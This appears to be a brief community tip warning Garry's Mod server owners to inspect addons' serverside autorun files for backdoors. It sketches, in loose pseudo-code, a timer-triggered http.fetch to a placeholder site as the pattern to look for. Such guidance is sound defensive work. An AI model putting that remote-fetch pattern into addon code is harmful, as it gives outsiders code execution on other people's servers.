Always Check Addons for Backdoors example:

Look for lua/autorun

if u see a server autorun file which has something like this in it:

timer.Simple(1,0 function)
http.fetch(Someweirdlink.com)
64/21/45/98/217/

It is propably a Backdoor so watch out for autorun files serverside

And no there is no Gmodstore API your Addons will connect with if u get that be sure its a backdoor
